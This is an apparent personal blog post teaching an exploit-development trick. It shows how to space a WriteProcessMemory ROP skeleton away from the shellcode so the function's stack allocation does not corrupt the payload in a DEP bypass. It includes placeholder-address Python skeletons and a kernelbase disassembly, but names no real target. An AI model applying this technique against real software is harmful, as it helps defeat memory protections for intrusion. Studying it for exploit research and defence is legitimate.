Bypassing DEP - Increasing the Gap
This blog talks about how to use WriteProcessMemory API Call for executing shellcode in a scenario where there is very less gap between shellcode and WriteProcessMemory call skeleton
In this blog, I have documented a yet another less known way to perform DEP Bypass using WriteProcessMemory API Call in a scenario where your shellcode is of large size but you have very less space for shellcode insertion. We will talk on how you can use part of ROP chain's space for your shellcode to make sure that during the WriteProcessMemory API Operation, there is no shellcode corruption.
The following is the function defination of WriteProcessMemory API Call :-
[in] HANDLE hProcess,
[in] LPVOID lpBaseAddress,
[in] LPCVOID lpBuffer,
[in] SIZE_T nSize,
[out] SIZE_T *lpNumberOfBytesWritten
WriteProcessMemory API Call takes 5 arguments. First one being the handle to Process which indicates the handle of process where lpBuffer needs to be written. This defaults to -1 for current process. Next is lpBaseAddress which is basically the destination address for copying bytes. Next we have lpBuffer which is source address i.e address from where bytes will be copied from. Next we have nSize which is the number of bytes to be copied. Finally we have lpNumberOfBytesWritten which indicates address where WriteProcessMemory will write the number of bytes it was able to successfully copy. This address must be writeable.
Moving, on lets assume a scenario where an application is vulnerable to Buffer overflow. Now, the EIP overwrite happens at say 451th byte in Input buffer and the total bytes that needs to be sent to trigger the overflow are 750 bytes. In such case input would look like below :-
Input buffer = "A"*450 + "B"*4 + "C"*(750-430-4)
In this case, once we send the above input to vulnerable application, it would overwrite the EIP with
0x42424242and crash the program. We also verify that application is compiled with DEP protection and hence would involve ROP chains to execute shellcode.
Let's assume that our shellcode is of size 410 bytes. In such case, we would be sending shellcode along with As. Now, the input would look like below :-
Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*316
Now, let's create the skeleton for WriteProcessMemory API Call.
wp = struct.pack("<L",0x45454545) # Address of IAT entry containing WriteProcessMemory
wp += struct.pack("<L",0x46464646) # Return address after executing WriteProcessMemory
wp += struct.pack("<L",0xffffffff) # Value of hProcess
wp += struct.pack("<L",0x47474747) # Value of lpBaseAddress
wp += struct.pack("<L",0x48484848) # Value of lpBuffer
wp += struct.pack("<L",0x49494949) # Value of nSize
wp += struct.pack("<L",0x50505050) # Value of lpNumberOfBytesWritten
Now, the input would look something like below (Size of wp is 28) :-
Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>
A question to readers, does the above input structure looks safe in context of shellcode corruption, when we write ROP chains to make EIP point to start of wp after patching wp at runtime via ROP Chains?
If you answered NO, then great work. You identified a potential Rabbit hole and saved yourself some time.
Well, if you answered YES, then you just dropped into a rabbit hole like me :) . Let's talk why.
To understand the issue, lets deep dive into assembly of WriteProcessMemory Function.
0:002> u kernelbase!WriteProcessMemory L50
755f3990 8bff mov edi,edi
755f3992 55 push ebp
755f3993 8bec mov ebp,esp
755f3995 83ec30 sub esp,30h
755f3998 53 push ebx
755f3999 57 push edi
755f399a 33db xor ebx,ebx
755f399c 8d45d0 lea eax,[ebp-30h]
755f399f 53 push ebx
755f39a0 6a1c push 1Ch
755f39a2 50 push eax
755f39a3 6a08 push 8
755f39a5 ff750c push dword ptr [ebp+0Ch]
755f39a8 895df8 mov dword ptr [ebp-8],ebx
755f39ab ff7508 push dword ptr [ebp+8]
755f39ae 895df4 mov dword ptr [ebp-0Ch],ebx
755f39b1 895dfc mov dword ptr [ebp-4],ebx
755f39b4 ff1548046975 call dword ptr [KERNELBASE!imp_NtQueryVirtualMemory (75690448)]
755f39ba 8bc8 mov ecx,eax
755f39bc 85c9 test ecx,ecx
Lets skim through the WriteProcessMemory method in kernelbase. As shown above we see a
sub esp, 30instruction which is basically allocating stack for WriteProcessMemory's operations. The function's prolouge is followed by multiple push statements which are performing stack operations.
Recall that our input buffer was of format
input buffer = shellcode + "A" * 12 + wp + EIP + ROP
Moment EIP reaches the start of wp after executing our ROP Gadgets, it would jump directly into WriteProcessMemory function. To help understand, lets assume that the address of wp's start is
0x5000000. The input looks something like this in address space :-
0x4fffe66 <start of shellcode>
0x4ffffd0 <DWORD inside shellcode>
0x4fffff3 <last byte of shellcode>
0x5000000 <start of wp> -> ESP Pointing here
Now, before executing WriteProcessMemory API Call, ESP would be pointing to start of wp (Read basics of ROP Chains on why). When it starts the execution of WriteProcessMemory ESP still points at same address. Now when EIP reaches address
0x755f3995in WriteProcessMemory, ESP still points to
0x5000000. Now, moment EIP executes
sub esp,30makes ESP =
0x4ffffd0. As you might have guessed, this is where problem starts.
Since there is not enough space between end of shellcode and start of wp, ESP ended up pointing inside our shellcode. Subsequent push instructions will go and corrupt our shellcode failing our exploit.
Now, that we understood the rabbit hole, lets find a way out.
The basic idea is to increase the space between end of shellcode and start of wp so that ESP does't end up inside our shellcode. We can do something interesting over here.
Suggested input structure :-
Input buffer = shellcode + "A"*12 + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop
The above proposed input structure basically uses dummy instructions to increase gap between shellcode and wp. We can use gadgets like
xor eax,eaxor any non-destructive instructions to increase this gap. But this come's with a trade off. It ends up eating our space for ROP Chains. The greater the number of dummy instructions, the less space left for ROP Chain.
One trick to smartly workaround this is to use instructions like
add esp,0x20which instead of using dummy instruction, adds esp right away increasing the gap between shellcode and ESP. This would require less dummy instructions and can help us land right into ROP Chains. With proper stack alignment this can be used to make EIP point to start of our ROP chains rather than somewhere in between.
This trick was discovered by me during my learning process. I have not come across much blogs explaining the workaround the size restrictions so thought it might be a good idea to share this with community. Contact me on Twitter for any feedbacks.